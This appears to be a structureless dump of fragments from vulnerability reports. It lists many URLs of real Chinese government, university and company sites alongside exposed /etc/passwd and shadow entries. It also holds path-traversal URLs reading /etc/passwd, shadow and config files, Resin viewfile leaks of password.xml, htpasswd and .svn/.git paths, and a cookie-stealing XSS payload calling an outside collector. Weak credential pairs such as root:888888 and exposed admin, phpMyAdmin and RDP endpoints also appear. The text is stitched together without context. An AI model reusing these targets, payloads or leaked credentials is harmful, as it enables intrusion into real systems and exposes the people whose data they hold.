gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin azureuser:x:500:500::/home/azureuser:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin mongod:x:498:498:mongod:/var/lib/mongo:/bin/false http://wsxf.agri.gov.cn/bzxx.htm http://iphone.wochacha.com/personcenter/info?page=1&city_id=1&udid=854882cbf4835a9eb81f5cd49e714a43********&openid=854882cbf4835a9eb81f5********44cd6&v=7.0.2&source=iphone&connectnet=wifi&os=iphone http://iphone.wochacha.com/personcenter/info?page=1&city_id=1&udid=854882cbf4835a9eb81f5cd49e714a43********&openid=854882cbf4835a9eb81f5********44cd6&v=7.0.2&source=iphone&connectnet=wifi&os=iphone http://chat.xcar.com.cn/blog/guestbook.php?page=1 http://www.easytransfer.cn:8003,可惜未爆破 http://www.easytransfer.cn:8004 http://101.227.68.194:8099/login.aspx admin:admin http://211.157.15.200/index.php root:x:0:0:root:/root:/usr/local/bash_4.1/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin nslcd:x:65:55:LDAP User:/:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin backupman:x:500:500::/home/backupman:/usr/local/bash_4.1/bin/bash mysql:x:30019:202::/home/mysql:/usr/local/bash_4.1/bin/bash www:x:80:80::/home/www:/sbin/nologin admin:x:30020:30020::/home/admin:/usr/local/bash_4.1/bin/bash http://km.oa.com/group/gslb/article_view/60750 jpLH1:16352:0:99999:7 http://183.60.76.243:8003/root/.bash_history http://183.60.76.243:8003/root/1.sql http://ehome.zte.com.cn//index.php?app=search&cate_id=505&page=1 http://ehome.zte.com.cn//index.php?app=s http://sqlmap.org http://www.mkzhan.com/ http://www.qb178.com/login.action http://xsc.bjut.edu.cn/Admin.php http://grandcloud.sdo.com/optool/index.php?r=ajax/QueryAreaList&serviceId=2 http://grandcloud.sdo.com/optool/index.php?r=ajax/QueryAreaList&serviceId=2 lRISpmqj4t1:16403:0:99999:7 www.tumen.gov.cn/news/news.asp?id=1193 www.tumen.gov.cn/news/news.asp?id=1193 http://sqlmap.org http://market.bitauto.com/chery/support/ http://market.bitauto.com/chery/support/eWebEditorExt/syslogin.aspx http://market.bitauto.com/chery/support/eWebEditorExt/jc_editor/dialog/img.htm http://wooyun.org/bugs/wooyun-2014-050728 http://www.siteview.com/cms/sites/public/case-content/it.html https://github.com/SiteView/ECC8.1.3/blob/7d7d8c7e7d7e7e03fa14f9f0e3ce5e04aacdb033/ECC8.1/Server/kennel/Alert/EmailAlert/emailTest.cpp http://fly.lfmz.gov.cn/ http://www.zjgxzsp.gov.cn/zjg_sp_front/showinfo/search.aspx?type=2&txt= http://www.zjgxzsp.gov.cn/zjg_sp_front/showinfo/search.aspx?type=2&txt= http://www.zjgxzsp.gov.cn/zjg_sp_front/ShowInfo/sxlist.aspx?TASKCLASS_FORZHUTHEME=%E5%AE%89%E5%85%A8%E9%98%B2%E6%8A%A4&type=1 http://www.zjgxzsp.gov.cn/zjg_sp_front/ShowInfo/sxlist.aspx?ougu http://www.zjgxzsp.gov.cn/zjg_sp_front/ShowInfo/sxlist.aspx?ougu http://www.zjgxzsp.gov.cn/zjg_sp_front/ShowInfo/sxlist.aspx?APPLYERCLASS=&type= http://www.zjgql.gov.cn/gk.asp?ID=1 http://reg.cntv.cn/forgetPassword/findPassword.jsp http://reg.cntv.cn/forgetPassword/forgetPasswordReset.action?usridSecret=a61df9b7ca12886d65d2d9341e05868091933bfb578da1e5e5a6e6ee74f0e074ef64c1baa72e4a3a&compareFlag=6b031e783ad8750155ec817300e0b59a&code=67A83019E298968167E9454FB8A3DDBA8863EE8C http://game.g.pptv.com/guest/c/yxsd/api.php?action=login,这也是一个登陆框,整站并没有其他东西 http://supplier.sinopec.com:9001/logonAction.do http://www.xcfdc.gov.cn/weblinkmx.asp?cityID=1&classID=1 http://www.xcfdc.gov.cn/news.asp?bd=72 http://www.xcfdc.gov.cn/weblinkmx.asp?cityID=1 http://xxcg.ciwong.com/learninglevel/SubjectDetail?id=89 http://e.ciwong.com/home/go?schoolId=224161 http://gxkt.ciwong.com/captcha/index?aid=20130110 http://www.shannet.net/ www.sdtsx.com/shownews.asp?id=190 www.bxqianfeng.com/shownews.asp?id=185 www.sdtsx.com/shownews.asp?id=179 www.sdbzht.cn/shownews.asp?id=133 www.sdjrsm.com/shownews.asp?id=204 www.sdpuli.com/shownews.asp?id=193 www.sddequan.com/Shownews.asp?id=168 www.sdmwmy.cn/shownews.asp?id=194 www.sdlzmm.cn/shownews.asp?id=195 www.zpyixin.com/shownews.asp?id=194 www.yxsffz.com/shownews.asp?id=191 www.sdzd.cc/shownews.asp?id=198 www.yxjsmy.com/shownews.asp?id=193 www.zpjianqiao.com/shownews.asp?id=170 www.zpjianqiao.com/shownews.asp?id=171 www.sdlyyz.cn/shownews.asp?id=196 www.zpsymm.com/shownews.asp?id=198 www.stsswkj.com/shownews.asp?id=167 www.sdltml.com/shownews.asp?id=118 www.wdjqwj.com/shownews.asp?id=193 www.jthg88.com/shownews.asp?id=205 www.hrjmx.com/shownews.asp?id=177 www.sdtsx.com/admin/login.asp www.sdtsx.com/admin/login.asp www.sdjrsm.com/admin/login.asp www.sdpuli.com/admin/login.asp www.sddequan.com/admin/login.asp www.zpyixin.com/admin/login.asp www.yxsffz.com/admin/login.asp www.zpjianqiao.com/admin/login.asp www.sdlyyz.cn/admin/login.asp www.zpsymm.com/admin/login.asp www.stsswkj.com/admin/login.asp www.sdltml.com/admin/login.asp www.wdjqwj.com/admin/login.asp www.jthg88.com/admin/login.asp www.hrjmx.com/admin/login.asp www.bxqianfeng.com/admin/login.asp www.sdbzht.cn/admin/login.asp www.sdmwmy.cn/admin/login.asp www.sdlzmm.cn/admin/login.asp www.sdzd.cc/admin/login.asp www.yxjsmy.com/admin/login.asp http://120.197.95.230:8080/ http://120.197.95.230:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml pince:Txpd1jQc/xwhISIqodEjfw==:staff,website filch:KmZIq2RKXAHV4BaoNHfupQ==:staff http://120.197.95.230:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://c.weipai.cn/ http://wei.gaofen.com/index.php?g=Wap&m=Vote&a=index&token=ygswip1402448998&wecha_id=1421416731980&id=1 http://c.weipai.cn/ http://c.weipai.cn/etc/htpasswd.users http://act.imir.sdo.com/project/pjs_jt/index.asp?actname=&page=3 http://chuanqi.sdo.com/project/cosplay/videolist.asp?categoryid=2003 https://github.com/LeoOnHack/Log-Smart/blob/aa296f726c224d4242bba1f5722aaec64d6cb5be/exp/exp-email-08.py http://www.yangche51.com/customer/retrievepasswordstep.aspx?action=phone&token=爆破得到 phyedu.dlut.edu.cn/phy/teachershow.php?id=1 http://www.ciwong.net/www.ciwong.net.rar www.tuhu.cn http://61.152.103.29/ http://9.qq.com/QQ九仙 http://www.cae.com.cn/webfunction/deliveryrange/cityrange.aspx?cid=0007 http://play.easou.com/d.e?gameId=1253&esid=ak0V-8TD4ig9LoqxDC&wver=c&qn=33&fr=1&l=1&version=c https://github.com/isme-jac/wl_product/blob/7119ea9d751e0fcba09c13adf08c822ba2c8a5c6/core/mail.php LoginRegisterAjax.aspx/FindMobliePwd www.muyingzhijia.com http://www.muyingzhijia.com http://agents.easou.com/agents/ums/logon.jsp http://agents.easou.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml http://caucho.com/ns/resin"> test:type=Basic example:name=basic http://agents.easou.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml ip:124.202.137.124 http://ndc.zjgsu.edu.cn/index.action https://github.com/haipenge/faceye-feature/blob/fe7e8815909aafcd74b569bf1d7de592980a2589/src/main/resources/mail.properties http://121.10.241.110:50060/ http://121.10.241.110:50060/logs/ http://121.10.241.110:50060/logs/hadoop-hadoop-jobtracker-other-tel-zhaoqin-110.aipai.com.log.2015-01-16 IP:124.202.137.138 http://www.ehaier.com/subject/ppjxr.html www.ehaier.com http://www.sinoagent.com/vc/vc/columncount/downfile.jsp?savename=a.txt&filename=../../../../../../../../etc/passwd http://www.njhdgcj.com/vc/vc/html/upload/j.jsp http://*.e.ciwong.com/course/Home/,提交课本名称处,CourseName字段可进行POST注入。 http://bmxx.e.ciwong.com/ http://ftwy.e.ciwong.com/ http://hfsjwy.e.ciwong.com/ http://hlsz.e.ciwong.com/ http://hqczx.e.ciwong.com/ http://bmxx.e.ciwong.com/course/Home/,抓包, http://218.94.6.164/Account/Login.aspx http://www.lycgs.gov.cn:9080/wscgs/liuyan.do?type=lynr&id=32082&lb=0 http://www.zjgfpc.gov.cn/SDFF/2_ysz/View_Picture.asp?ID=49 http://www.zjgfpc.gov.cn/old/qczx1.asp?aid=4965 http://sso.easou.com/ http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml http://caucho.com/ns/resin xmlns:resin="http://caucho.com/ns/resin/core resin:type="com.caucho.portal.generic.GenericPortal resin:type="com.caucho.portal.generic.BufferFactoryImpl resin:type="com.caucho.portal.alpharenderer.HtmlRenderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer"/ resin:type="com.caucho.doc.config.TreePortlet https://116.236.247.174/vote/views/login.html?r=0.6828486339654773 https://116.236.247.174/servlet/Image http://www.80vul.com/yzm/v.php?url=http://static.wooyun.org/wooyun/upload/201501/17151946732f854ecd3668a574a72e076d7c0a7d.jpeg http://www.80vul.com/yzm/v.php?url=https://e.ebscn.com/servlet/Image https://e.ebscn.com http://sdk2.entinfo.cn/z_mdsmssend.aspx http://www.yaofang.cn/a/user/Show_Pass www.zygl.cn http://www.weipai.cn/ http://kyc.zjgsu.edu.cn/kyc_new/notify.do?ActionMethod=view&id=1543 http://1004.ent.weipai.cn/etc/htpasswd.users http://ent.weipai.cn/ http://ent.weipai.cn/data/Gateway/ http://phylab.ysu.edu.cn/news/front/shownews.asp?id=130 http://android.wochacha.com/shopsale/storedetail?city_id=15&v=8.0.0&stid=28959&connectnet=wifi&distime=1232553600&protime=1232553600&newudid=3368d926dcb2f8ceee1211c7c5d34587&lng=11*.****96&mac=******&from=super&udid=359050050095308&lat=2*.****89 http://android.wochacha.com/shopsale/allbrandlist?city_id=15&v=8.0.0&connectnet=wifi&newudid=3368d926dcb2f8ceee1211c7c5d34587&lng=****&mac=B8%3A5E%3A7B%3A55%3AA6%3AC9&udid=359050050095308&lat=****&usuastid=[{"stid":"28959","time":"1232553600 www.meilele.com http://www.meilele.com http://wz.easou.com http://wz.easou.com:80/coln.e?esid=X8TDH5mErCJ&tk=com_teamwork2 http://www.rsc.sdu.edu.cn/2010new2/display.php?id=888 http://www.cpbao.com/user/fund!bindMobileOrEmail.action?userIdCard=用户ID&isBindEmail=1&bindEmail=邮箱; http://shu.easou.com/ http://shu.easou.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml pince:Txpd1jQc/xwhISIqodEjfw==:staff,website filch:KmZIq2RKXAHV4BaoNHfupQ==:staff http://shu.easou.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://yun.lenovo.com/lxymanage/login.php http://yun.lenovo.com/lxymanage/member1.php http://yun.lenovo.com/ http://www.codoon.com/login http://www.codoon.com/home http://www.lycgs.gov.cn:9080/wscgs/yymap.do?type=load&dwlb=01 http://feedback.uc.cn/feedback/feedback/delete_feedback_data?uc_param_str=einibicppfmivesifrutlantcunwsssv http://9air.com/ http://121.12.117.111:9231/v2014/ http://222.74.163.22:8080/system/login!input.action http://www.nxzwzx.com/ http://gongshe.cig.com.cn/登录id需要四位数字,生成0001—9999 www.qikanw.com http://t2.easou.com http://t2.easou.com/zone/mobile/mobilekey/key/0/breed_id/1 http://jxhd.ciwong.com/ http://bbs.ciwong.com/login.aspx http://super.admin.ciwong.com/Admin/Login http://mail.ciwong.com/index.php http://gwy2013.ciwong.com/lead/Login http://anquan.ciwong.com/Account/Login/ http://e.ciwong.com/login/indexbefore http://e.ciwong.com/login/ http://admin.eschool.ciwong.com/users/login http://admin.ciwong.net/Permission/Login/Login http://demo.ciwong.com/ http://game.ciwong.com/game/Play/1315 http://bbs.ciwong.com/ReadMe.txt http://www.6v68.com/Areas/ http://www.6v68.com/admin/ http://113.106.50.4:81/admin/ rdp://121.14.117.223:6543 rdp://121.14.117.26:6543 rdp://113.106.50.9:6543 http://218.58.70.209:8080/ http://218.58.70.209:8080/providerUnlock.jsp http://mooc.chaoxing.com/ http://www.chinare.org.cn/standardList/?publishYear=2013 http://www.geodata.cn/Portal/imagebase/rsResult.jsp?rstype=6*&year=&month=00&col=&row=&isCookieChecked=true http://www.geodata.cn/Portal/SamplePreview?id=chinare-4424 http://www.geodata.cn/Portal/intelNavigation/extSiteShow.jsp?search=&isCookieChecked=true http://www.geodata.cn/Portal/newsbrowse/news_list.jsp?newssort_ID=115&isCookieChecked=true http://114.251.39.178/jsp/.svn/entries https://open.cebbank.com/portal/EReceivePayAuth.do https://open.cebbank.com/portal/SunnyEReceive.do?BankId=9998&WT.ac_id=800000102 http://bbs.paojiao.com/.svn/entries http://www.szzwfw.gov.cn/xzsp/servlet/openFile?filename=ff8080813abfc49d013b639dd77b015f.doc&filepath=biaogefiles&showname=%C8%EB%BA%D3%C5%C5%CE%DB%BF%DA%C9%E8%D6%C3%C9%EA%C7%EB%CA%E9.doc http://www.szzwfw.gov.cn/xzsp/servlet/openFile?filename=shadow&filepath=../../../../../../etc http://www.szzwfw.gov.cn/xzsp/servlet/openFile?filename=jsp/web_sxcz/index_list_jc.jsp&filepath=/ http://www.szzwfw.gov.cn/xzsp/servlet/openFile?filename=WEB-INF/web.xml&filepath=/ peRr3NUyeNiW3c2GvxYDo1:16307:0:99999:7 http://www.agridata.cn/data/dataList.aspx?firstSubject_par=1 http://www.ceas.org.cn/photo/article_show.asp?channelid=3&articleid=8391 http://www.ceas.org.cn/flfg/soft_show.asp?channelid=1003&softid=2799 http://oa.socool-tech.com/Login_bin/login_1.html http://zhns.socool-tech.com/Login_bin/login_1.html# http://aged.socool-tech.com/Login_bin/main_4.html# http://zhsqgz.socool-tech.com/Login_bin/login_1.html# http://zhsqfw.socool-tech.com:92/# http://oa.socool-tech.com:82/ http://zhns.socool-tech.com:82/ http://aged.socool-tech.com:82/ http://zhsqgz.socool-tech.com:82/ http://zhsqfw.socool-tech.com:82/ http://union.suning.com/aas/wap/ad/single-promotion!search.action?search=y ctx:/aas https://kyfw.12306.cn/otn/login/init https://kyfw.12306.cn http://www.16wifi.com/ inurl:honor/rydt/jianjie?uid= http://www.vsread.com/index.php/honor/rydt/jianjie?uid=20972&t=1 http://218.87.140.106/ http://oa.jxgxedu.gov.cn/ http://59.55.33.137:8010/ http://59.55.33.137:8040/ https://www.bigsun.com.cn/zxjt/lccs/dxjjinfo.jsp?jjid=020001 http://221.204.31.9/ www.kdgj.cn/login.jsp http://221.130.61.78:8090/ inurl:CH/news.asp?BigClassID= http://www.cnyfcj.com/CH/news.asp?BigClassID=2 http://www.sqlmap.org www.cnyfcj.com\session http://www.cnyfcj.com:80/CH/index.asp http://orc.sjtu.edu.cn/lunwen.php?id=1 http://phyedu.dlut.edu.cn/show.php?id=325 http://jzx.jluzh.com/kygood/downfile.asp?filename=../conn.asp http://www.czwhcb.gov.cn/manager/login.aspx http://www.camh.org.cn/admin/MakeTopictoHTML.php?channelID=4 http://www.yanshilong.com/admin/MakeTopictoHTML.php?channelID=23 http://www.chnria.com/admin/MakeTopictoHTML.php?channelID=16 http://159.226.113.130/admin/MakeTopictoHTML.php?channelID=3 http://www1.psych.ac.cn/admin/MakeTopictoHTML.php?channelID=3 http://www.caim.org.cn/admin/MakeTopictoHTML.php?channelID=10 http://home.focus.cn/product/goodsdetail_2354_30509/ http://home.focus.cn/product/goodsdetail_2354_30509'/ http://home.focus.cn/product/goodsdetail_2354_30509''/ http://sese.sjtu.edu.cn/TeacherTeam/DetailTeacherInfo.php?num=2&cnum=1&ID=1 http://www.haoran.sjtu.edu.cn/customer/custdetail.asp?id=267 http://www.haoran.sjtu.edu.cn/admin/access/ http://wap.kuwo.cn/wap/wap/Model?id=72 https://mobile.cmbchina.com/MobileHtml/Login/LoginC.aspx http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69 http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69 http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69/1 http://v2.expo2013.city.sina.com.cn/s/pnlink.php?id=12473&typeid=69-1 https://sns.amap.com IP:sns.amap.com http://218.106.129.7/ http://tvs.tcl.com/bigfile/ jdbc:oracle:thin:@10.3.3.149:1521:phone http://218.106.129.23:8080/ http://218.106.129.60/yanshijilu.php?s_province=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%88%86%E5%85%AC%E5%8F%B8&s_city=%E8%AF%B7%E9%80%89%E6%8B%A9%E5%88%86%E9%83%A8&s_county=11 http://218.106.129.60/show.php?s_city=Chicago&s_county=MIDDX&s_province=1 http://mail.chinahaisheng.com http://w3.geekpark.net/display?cat=1 http://218.106.129.13/DRP/ http://www.tcl.com/data/haoy.php http://gpk.im http://gpk.im/admin/index.php http://www.changan.com.cn:80/ www.changan.com.cn http://shenpi.yonyou.com/ http://shu.easou.com/) http://shu.easou.com/reader.e?tagid=38&rpt=list&esid=7uTD95pbqN1&qd=M3150001&fr=3.r1_c.93 http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=~/News.aspx http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=%2fQueryWebs%2fAccount%2f http://sjhj075489802999.eicp.net:81/QueryWebs/Account/Login.aspx?ReturnUrl=~%2fQuery.aspx http://sjhj075489802999.eicp.net:81 http://xlfhssygjr.eicp.net:81/QueryWebs/Account/Login.aspx http://hqsz.ouc.edu.cn http://it.ouc.edu.cn/visionlab/login.aspx http://222.51.224.76/QueryWebs/Account/Login.aspx http://222.51.224.76/QueryWebs/Account/Login.aspx http://xiaoyuan.lefeng.com/page/.svn/entries http://xiaoyuan.lefeng.com/page/common/.svn/entries http://61.133.99.76/ http://www.haust.edu.cn/document/default.aspx?siteid=50&columnid=%b1%ed%b8%f1%cf%c2%d4%d8 http://www.haust.edu.cn/document/default.aspx?siteid=50&columnid=%ce%c4%bc%fe%bb%e3%b1%e0 http://www.haust.edu.cn/document/default.aspx?siteid=50&columnid=%d7%ca%c1%cf%cf%c2%d4%d8 http://data.pension.hexun.com/ http://www.faisco.cn/password.jsp http://old.geekpark.net/ajax/like_entity http://www.ahnw.gov.cn/nwsms/ http://bdyh.baidu.com/login.action http://www.cits.cn/member/faq.html http://218.106.130.40:8080/ https://github.com/zacharyhu/Hello-World/blob/7af3217607fe88c86fb8792a8bf42607b39f60bf/html_test/sendmsg2.php http://content.businessvalue.com.cn/special/32819* http://www.shandongair.com.cn/query/login.jsp http://t.178.com/widget/tweet/resource?token=kAdAB5&token32=a422b048a5c2560d8896f001573380c3&order=default&comment_order=desc http://old.geekpark.net/ajax/share_plus http://220.181.163.184/ http://220.181.163.184/phpmyadmin/ http://www.53kf.com/?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00login http://ehr.tcl.com/gls/ http://60.29.238.177/report http://60.29.238.179/report http://tg.hexun.com/ajaxresponse/response2.aspx?func=bindteacherlist&userids=%2716799401%27,%2725144711%27,%2725144761%27,%2725147204%27,%2725178838%27,%2725178866%27,%2725179068%27,%2725184126%27,%2725185826%27&_=1421384235342 http://www.pengpengmall.com/mall/goods/help/index.html?id=3462617 http://www.tcldisplay.com/service.asp http://www.tcldisplay.com/list.asp?ID=38 http://hubei.tsyw.bankcomm.com:8080/UserFiles/Image/test/guige.jsp http://hubei.tsyw.bankcomm.com:8080/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.tuniu.com/trips/10003511 data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ http://xxpt.zjmc.net.cn/xxpt/Index.action http://www.55bbs.com/ http://groupoa.tcl.com/tcl/Infor/InforManage.nsf?opendatabase http://ku.178.com/top/hot?c=8&t=month http://www.12333sh.gov.cn/200912333/2009wsbs/grbs/shbx/01/200909/t20090917_1085043.shtml http://www.12333sh.gov.cn/grxx/grxx.jsp http://www.yuantiku.com/campus/.git/config http://qqvip.caissa.com.cn:28017/ http://www.hainanpost.cn/news_list.asp?cataid=6291456 http://www.hainanpost.cn/news_detail.asp?id=15323 http://www.wcb.yn.gov.cn:8080/login/fRegister.aspx http://www.wcb.yn.gov.cn:8080/index/index.aspx http://www.wcb.yn.gov.cn:8080/sys_BiddingRecord/fFrame.aspx http://www.minjiao.com/ http://gw.zzlwjy.com/SysModule/Account/AccountAdd.aspx http://gw.jojy.net/SysModule/Account/AccountAdd.aspx http://gw.ptedu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.qledu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.gledu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.mwedu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.fjhajy.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.fjjyjy.net/SysModule/Account/AccountAdd.aspx http://gw.fqedu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.mwedu.gov.cn/SysModule/Account/AccountAdd.aspx http://gw.jojy.net/SysModule/Account/AccountAdd.aspx http://ns.dlfilm.com//cmts_sales/cinemaplan!CinemaPlan.action http://ns.dlfilm.com//cmts_sales/cinemaplan!CinemaPlan.action http://www.dlfilm.com/ http://60.29.19.128/zbb/ http://60.29.19.128/zbb/tjsinfo/zbb/system/login.action http://data.kuwo.cn/config.cf?type=103文件中都能找到如下ip http://www.enghengyang.gov.cn/showdetail.aspx?newsid=12187 http://www.wandafilm.com/baseInfo/film/filmIndex.do?m=film_info_init_next&filmId=20141229111046116265 HTTP://xss.hacktask.net/njgZKz?1421640813 http://www.wandafilm.com/user/message_mgr.do?m=init http://www3.ouc.edu.cn/yjsjy/oucxwxx/xwb.htm http://sports.ifeng.com/nba/team/match/14?sch_date=2014-0 www.qysjtj.gov.cn/class.php?code=07 http://uctest.ucweb.com:8088/Page/XHTML/Tag/15.4.5/15.4.5.19.xhtml http://shop.818hr.cn/phpmyadmin/ http://www.zzb.buct.edu.cn/admin/Admin_Login.asp http://www.comingchina.com/html/downloads/ http://www.comingchina.com/html/case/ http://mail.fuck.com/webmail/为普通用户的登录入口 http://mail.fuck.com/webmail/admin/?module=user&action=login为域/超域/系统管理员的登录入口 http://sales.xcar.com.cn/admin/login.php http://xxx/xxx.html https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。 http://mhz.pw/game/SOP/01.php www.dapu.com/product-update_ask-690.html http://xxx/xxx.html https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。 http://mhz.pw/game/SOP/01.php http://www.baidu.com/cb.php?c=IgF_pyfqnHRzrj6kn1R0IZ0qnfK9ujYkPjbsrj610Aw-5HDdnWbznHR0TAq15HbdnHcYn6K15H04uhRkPhRsmH03PjDvPvc0uZfqnHfznHmdnHmvrfKdThsqpZwYTjCEQLILIz4JpgNJpgNCIgI9pi4WUvYEP1nvP1b1Qh9YUys0ThfqnW60mhYqn0KsTWYs0ZNGujY1Pjnknj0k0AqGujY3njfsP6KWpyfqnHDzrjRL0AqLUWYLrjD4nfKWThnqn1nsPjD http://www.jiujiuhuwai.com/736793.html http://218.5.1.22:8001/tsp/ http://clbd.ciwong.com/CloudReader/Home/AjaxGetSchool http://58.56.25.53/xxpt/jpzy/index.asp http://58.56.25.53/xxpt/jpzy/indexkw.asp http://58.56.25.53/xxpt/hkqwx/index.asp http://58.56.25.53/index.htm http://58.56.25.53/admin http://www.nclggq.com/szwyadmin/login.asp http://baike.baidu.com/link?url=Bookhr3XPpnGzIRBdjUwDfkSht1fLhZLqrz6PQ_Y3afjPNGuKCKU4Fvr7vy4ToC792WyvCiqxDiuV1SmHIWGsa http://first-trial.huawei.com/ http://ilas.lib.hustwb.edu.cn/NTRdrLogin.aspx http://haohaizi.ciwong.com/search/GetVideo?_=0.7888064351864159&cate=2&order=2&page=1&txt=e http://www.6v68.com/EShop/ShopCenter/GetProductsBy?shopId=&type=0&typeTwo=0&periodId=0&subjectId=0&pageIndex=0&pageSize=20&minValues=0&maxValues=0&_=1421661246302 http://www.6v68.com/EShop/ShopCenter/GetProductsBy?shopId=&type=0&typeTwo=0&periodId=0&subjectId=0&pageIndex=0&pageSize=20&minValues=0&maxValues=0&_=1421661246302 http://musicmini.baidu.com/app/passport/getBDUSS.php http://disk.yun.uc.cn/ajax/pcmkdir?dirid=1&dirname=wooyun&_=1421665148737 http://disk.yun.uc.cn/ajax/pcmkdir?dirid=1&dirname=testuc&_=1421665148737 http://dept.wyu.edu.cn/xinxi/shownews.asp?nsid=837 http://219.142.122.7:8080/Manager/Login.aspx www.xinyi.gov.cn http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=~/News.aspx http://xlfhssygjr.eicp.net:81/QueryWebs/Account/Login.aspx http://222.51.224.76/QueryWebs/Account/Login.aspx http://sjhj075489802999.eicp.net:81/QueryWebs/Account/Login.aspx?ReturnUrl=~%2fQuery.aspx http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=~/News.aspx http://119.145.193.214/QueryWebs/Account/Login.aspx?ReturnUrl=%2fQueryWebs%2fAccount%2f http://bj.cgws.com/ http://soft.zdnet.com.cn/files/poll_show.php?actionid=84 http://www.seecom.com.cn/StationSearch.aspx?key=1 http://www.seecom.com.cn/StationSearch.aspx?key=1% http://user.g.pptv.com/login/cms/?gid=dgwm,可以看到这个登陆地址也是只有一个单纯的登陆框,但是这次和前两单纯的绕过抓包限制不同了,这次的有个验证码,尼玛难度一下提升了有木有! http://cloud.buu.edu.cn:34899/templet_pro.do http://183.62.232.32:8080/ http://www.olvip.cn:8080/ http://218.56.48.139:8083/front/register/register.html http://218.56.48.139:8003/check_id.asp?username=system http://218.56.48.139:8003/check_id.asp?username=system http://email.ctgpc.com.cn/ http://www5.53kf.com/iframe_brief.php?style_id=106000198&language=cn http://wooyun.org/bugs/wooyun-2010-079668 http://wooyun.org/bugs/wooyun-2010-081423 www.huat.edu.cn http://wms.fruitday.com/ http://cztsg.sxfwu.com/FCKeditor/_whatsnew.html http://cztsg.sxfwu.com/FCKeditor/editor/filemanager/connectors/test.html http://cztsg.sxfwu.com/FCKeditor/editor/filemanager/connectors/uploadtest.html http://cztsg.sxfwu.com/Admin/Login.aspx http://cztsg.sxfwu.com/Admin/FAQ/asphxg.asp http://manager.ourhost.com.cn/ web:dancewithbanban web:888888 web:888888 root:888888 oracle:888888 sybase:888888 oracle:888888 test:888888 test:888888 oracle:888888 sybase:888888 oracle:888888 test:888888 test:888888 http://125.93.53.79:9080/TaskService/webChatAndLeaveWord.action?entranceid=www.mypengpeng.com&status=0&agentId=&tenantID=981&groupid=46404&clientURL=&clientIP= http://tj.fruitday.com/ http://xyb.xisu.edu.cn/userReg.asp www.998.com http://www.998.com http://www.998.com/Account/Sign 